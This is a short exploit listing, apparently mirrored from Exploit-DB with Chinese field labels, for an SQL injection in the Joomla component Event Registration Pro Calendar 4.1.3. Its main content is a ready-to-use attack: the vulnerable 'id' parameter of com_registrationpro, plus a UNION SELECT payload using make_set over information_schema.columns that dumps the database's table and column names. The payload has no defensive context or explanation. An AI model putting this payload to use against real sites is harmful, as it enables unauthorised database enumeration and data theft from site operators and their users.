Joomla! Component Event Registration Pro Calendar 4.1.3 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42416/
  • # # # # #
    # Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
    # Dork: N/A
    # Date: 02.08.2017
    # Vendor : http://joomlashowroom.com/
    # Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
    # Demo: http://demo3.joomlashowroom.com/
    # Version: 4.1.3
    # # # # #
    # Author: Ihsan Sencan
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
    # -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
    # Etc..
    # # # # #